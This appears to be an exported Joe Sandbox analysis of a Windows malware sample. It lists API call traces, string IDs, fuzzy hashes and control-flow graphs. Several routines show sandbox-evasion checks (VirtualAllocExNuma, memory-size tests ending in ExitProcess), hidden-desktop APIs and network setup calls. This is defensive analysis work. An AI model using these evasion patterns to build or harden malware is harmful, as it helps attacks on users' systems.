                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 74892c18735753fdcb43d6898fb2bbd14031f75c92b40c83a4145ed5eee66897
                                • Instruction ID: 21983f21328265ff7e28e4cb9fa14bc6d87a28336acafa85663d2272139b10d2
                                • Opcode Fuzzy Hash: 74892c18735753fdcb43d6898fb2bbd14031f75c92b40c83a4145ed5eee66897
                                • Instruction Fuzzy Hash: A56263B9A512019FD754DF67EEC8A263BB9F78E3813108919E955E3361DB34B808DF20
                                APIs
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C8F1D5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F1F1
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C8F1FC
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F215
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C8F220
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F239
                                • lstrcpy.KERNEL32(00000000,00CA4FA0), ref: 00C8F25E
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F28C
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F2C0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8F2F0
                                • lstrlen.KERNEL32(01785468), ref: 00C8F315
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 2ea70e2dbab133ebbad39fe4ff881c645f09f2dd5d980f89ab1e110c0a9035c8
                                • Instruction ID: 9752edb1c154d631ddb255d32ed825b1046e0e5b6e5d589ac575e96882dbad16
                                • Opcode Fuzzy Hash: 2ea70e2dbab133ebbad39fe4ff881c645f09f2dd5d980f89ab1e110c0a9035c8
                                • Instruction Fuzzy Hash: 13A28670A012058FCB60EF69D948A5ABBF4EF49318F19807DE419E7362D731ED46CB54
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90013
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C900BD
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C900E1
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C900EC
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90110
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C9011B
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C9013F
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C9015A
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90189
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C90194
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C901C3
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C901CE
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90206
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C90250
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C90288
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C9059B
                                • lstrlen.KERNEL32(017853C8), ref: 00C905AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C905D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00C905E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C9060E
                                • lstrlen.KERNEL32(0179EDB0), ref: 00C90625
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C9064C
                                • lstrcat.KERNEL32(00000000,?), ref: 00C90658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C90681
                                • lstrlen.KERNEL32(01785548), ref: 00C90698
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C906C9
                                • lstrcat.KERNEL32(00000000,?), ref: 00C906D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C90706
                                • lstrcpy.KERNEL32(00000000,01798C68), ref: 00C9074B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71557
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C71579
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C7159B
                                  • Part of subcall function 00C71530: lstrcpy.KERNEL32(00000000,?), ref: 00C715FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C9077F
                                • lstrcpy.KERNEL32(00000000,0179EC78), ref: 00C907E7
                                • lstrcpy.KERNEL32(00000000,01798998), ref: 00C90858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 00C908CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C90928
                                • lstrcpy.KERNEL32(00000000,01798908), ref: 00C909F8
                                  • Part of subcall function 00C724E0: lstrcpy.KERNEL32(00000000,?), ref: 00C72528
                                  • Part of subcall function 00C724E0: lstrcpy.KERNEL32(00000000,?), ref: 00C7254E
                                  • Part of subcall function 00C724E0: lstrcpy.KERNEL32(00000000,?), ref: 00C72577
                                • lstrcpy.KERNEL32(00000000,01798948), ref: 00C90ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C90B81
                                • lstrcpy.KERNEL32(00000000,01798948), ref: 00C90D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                 • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 0db4523307382981b37458eb7c1f8ebc762dc42253d248350c8c7636c9f14dd9
                                • Instruction ID: 92cacf69175f08bb4a2057a999e38721a174a08a7220d2ebf845c2bbcf26f025
                                • Opcode Fuzzy Hash: 0db4523307382981b37458eb7c1f8ebc762dc42253d248350c8c7636c9f14dd9
                                • Instruction Fuzzy Hash: 9FE27B70A053418FDB34DF29C489B6ABBE0BF88314F59856DE89D8B262DB31D945CF42
                                APIs
                                • lstrlen.KERNEL32(01785468), ref: 00C8F315
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F47B
                                • lstrcpy.KERNEL32(00000000,01785468), ref: 00C8F4BB
                                • lstrcpy.KERNEL32(00000000,01798C38), ref: 00C8F4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C8F61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00C8F718
                                • lstrlen.KERNEL32(01798B48), ref: 00C8F746
                                • lstrcpy.KERNEL32(00000000,01798B48), ref: 00C8F771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8F793
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8F7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00C8FA32
                                • lstrlen.KERNEL32(01798BB8), ref: 00C8FA60
                                • lstrcpy.KERNEL32(00000000,01798BB8), ref: 00C8FA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8FAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8FAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: ad8514ec2c759c22703bf945d4639897a6d8964c08f6cb0b9459b079f362cf1d
                                • Instruction ID: ff49e33352005ef5a3824228d10f310b5cceff071663e45db8f2cae7c63ebfb1
                                • Opcode Fuzzy Hash: ad8514ec2c759c22703bf945d4639897a6d8964c08f6cb0b9459b079f362cf1d
                                • Instruction Fuzzy Hash: 66F15F30A01202CFDB24EF69C944A66B7E5BF49318B19C1BED819AB362D731ED47CB54

                                 Control-flow Graph
                                 • Graph image not rendered in this export; entry block c88ca0, API calls StrCmpCA, ExitProcess, lstrlen, lstrcpy; subcalls c72a20, c72930
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: b798ff702bc494dd92e73e35c5c78abf65ef4b824ef6c19e67f62f7ac1e0f032
                                • Instruction ID: c2daf637d70eb2ed0706b7e79220050b3fa9b0aa2b8660429c093775b3757f57
                                • Opcode Fuzzy Hash: b798ff702bc494dd92e73e35c5c78abf65ef4b824ef6c19e67f62f7ac1e0f032
                                • Instruction Fuzzy Hash: CE51B034A14303EFC720AF76DD84A2BBBF5FF45708B91482DE456D2A01DBB4E549AB24

                                 Control-flow Graph
                                 • Graph image not rendered in this export; entry block c92740, API calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA; subcall c971e0
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00C9277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00C893B6,00000000,00000000,00000000,00000000), ref: 00C927AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C9280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92816
                                • wsprintfA.USER32 ref: 00C9283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: fc28c8ac9285ae0b40b93cb8f282bd198142022965022b3e6ff876f8a3aa9926
                                • Instruction ID: 97c00acde125bfd14747e58a0db307ec6e3fc891ff59bb88479a169faf9859ff
                                • Opcode Fuzzy Hash: fc28c8ac9285ae0b40b93cb8f282bd198142022965022b3e6ff876f8a3aa9926
                                • Instruction Fuzzy Hash: 023161B2904209AFCB04CFB98A899EFBFBCEF5D750F104169E515F7650E6349A408BA1

                                 Control-flow Graph
                                 • Graph image not rendered in this export; entry block c74bc0, API calls ??2@YAPAXI@Z (x3), lstrlen, InternetCrackUrlA; subcall c72a20
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00C74BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00C74C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00C74C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00C74C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00C74C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 0877cd05a966719647271ebdf1821582089510cf83c5c714d7a983ffdcae9368
                                • Instruction ID: 004c00b8aa95a048d96ae6c4f0d9e3cd3b27d7a2478d1e5084ca3873621ff46d
                                • Opcode Fuzzy Hash: 0877cd05a966719647271ebdf1821582089510cf83c5c714d7a983ffdcae9368
                                • Instruction Fuzzy Hash: 42012D71D00218AFDB14DFA9EC45B9EBBB8EB49320F008166F918E7390DB7459048FD4

                                 Control-flow Graph
                                 • Graph image not rendered in this export; entry block c71030, API calls GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc, VirtualFree
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C71046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C7104D
                                • ExitProcess.KERNEL32 ref: 00C71058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C7106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00C710AB
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 79b1d9204f16cb2eafcd5fd9b20906cdaca4a899c8da86350b97611fb4891c11
                                • Instruction ID: 05cd21777fce458dd13aff778e02a2e78a96d9b859536d950e8fbb1a519a57c7
                                • Opcode Fuzzy Hash: 79b1d9204f16cb2eafcd5fd9b20906cdaca4a899c8da86350b97611fb4891c11
                                • Instruction Fuzzy Hash: D901F4717802047FE7204A7A6C5AF6B77ADA78AB01F308014FB08F72C0DAB1FA048664

                                 Control-flow Graph
                                 • Graph image not rendered in this export; entry block c8ee90, API calls StrCmpCA, lstrcpy; subcalls c72930, c76c40, c72a20
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8EEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00C8EEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00C8EF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: 13cb6fabf2d5ee9ca0794526c53f7d980f42feef8b389dcb477027a590bc448c
                                • Instruction ID: 22b68fb0c86850fb2be9047f8da4269a783c4d2136a391abe60c667fb64aab97
                                • Opcode Fuzzy Hash: 13cb6fabf2d5ee9ca0794526c53f7d980f42feef8b389dcb477027a590bc448c
                                • Instruction Fuzzy Hash: 7A2127306202069FCB65FFB9DC46A9A37E4EF55318F04D438B95EDB202DA30ED01AB94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 c710c0-c710cb 2887 c710d0-c710dc 2886->2887 2889 c710de-c710f3 GlobalMemoryStatusEx 2887->2889 2890 c710f5-c71106 2889->2890 2891 c71112-c71114 ExitProcess 2889->2891 2892 c7111a-c7111d 2890->2892 2893 c71108 2890->2893 2893->2891 2894 c7110a-c71110 2893->2894 2894->2891 2894->2892
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 662ef61a09c2dcbce8de1aef981b1ec79576e1e7557f6ff67fac6646286cc8e5
                                • Instruction ID: 776e3fd8759692a15dfaaed9018cd1720bd76d3b86ca059be571188e9af607fc
                                • Opcode Fuzzy Hash: 662ef61a09c2dcbce8de1aef981b1ec79576e1e7557f6ff67fac6646286cc8e5
                                • Instruction Fuzzy Hash: 1CF05C701182448BEB106A6DDC4B32EF7D8FB053E0F68C929DEEFC6181E230D840A127

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 c88c88-c88cc4 StrCmpCA 2897 c88ccd-c88ce6 2895->2897 2898 c88cc6-c88cc7 ExitProcess 2895->2898 2900 c88cec-c88cf1 2897->2900 2901 c88ee2-c88eef call c72a20 2897->2901 2902 c88cf6-c88cf9 2900->2902 2904 c88cff 2902->2904 2905 c88ec3-c88edc 2902->2905 2907 c88e88-c88e9a lstrlen 2904->2907 2908 c88e6f-c88e7d StrCmpCA 2904->2908 2909 c88d84-c88d92 StrCmpCA 2904->2909 2910 c88da4-c88db8 StrCmpCA 2904->2910 2911 c88d06-c88d15 lstrlen 2904->2911 2912 c88d5a-c88d69 lstrlen 2904->2912 2913 c88dbd-c88dcb StrCmpCA 2904->2913 2914 c88ddd-c88deb StrCmpCA 2904->2914 2915 c88dfd-c88e0b StrCmpCA 2904->2915 2916 c88e1d-c88e2b StrCmpCA 2904->2916 2917 c88e3d-c88e4b StrCmpCA 2904->2917 2918 c88d30-c88d3f lstrlen 2904->2918 2919 c88e56-c88e64 StrCmpCA 2904->2919 2905->2901 2945 c88cf3 2905->2945 2927 c88e9c-c88ea1 call c72a20 2907->2927 2928 c88ea4-c88eb0 call c72930 2907->2928 2908->2905 2926 c88e7f-c88e86 2908->2926 2909->2905 2934 c88d98-c88d9f 2909->2934 2910->2905 2922 c88d1f-c88d2b call c72930 2911->2922 2923 c88d17-c88d1c call c72a20 2911->2923 2931 c88d6b-c88d70 call c72a20 2912->2931 2932 c88d73-c88d7f call c72930 2912->2932 2913->2905 2935 c88dd1-c88dd8 2913->2935 2914->2905 2936 c88df1-c88df8 2914->2936 2915->2905 2920 c88e11-c88e18 2915->2920 2916->2905 2921 c88e31-c88e38 2916->2921 2917->2905 2924 c88e4d-c88e54 2917->2924 2929 c88d49-c88d55 call c72930 2918->2929 2930 c88d41-c88d46 call c72a20 2918->2930 2919->2905 2925 c88e66-c88e6d 2919->2925 2920->2905 2921->2905 2954 c88eb3-c88eb5 2922->2954 2923->2922 2924->2905 2925->2905 2926->2905 2927->2928 2928->2954 2929->2954 2930->2929 2931->2932 2932->2954 2934->2905 2935->2905 2936->2905 2945->2902 2954->2905 2955 c88eb7-c88eb9 2954->2955 2955->2905 2956 c88ebb-c88ebd lstrcpy 2955->2956 2956->2905
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 78be50a506ececf2612b1583f85ba31189df5e7ca65d6214edc8f0a225c306a3
                                • Instruction ID: 10f7b39e47898f27ebb26fdabdade60648268d624e401104c4008ae1fd33f610
                                • Opcode Fuzzy Hash: 78be50a506ececf2612b1583f85ba31189df5e7ca65d6214edc8f0a225c306a3
                                • Instruction Fuzzy Hash: 9EE0D814244246ABCB1867F54C648D67FD9CF85210B410439B5018BA82E9686D49C329
                                APIs
                                • VirtualAlloc.KERNEL32(00000000), ref: 00EC1477
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
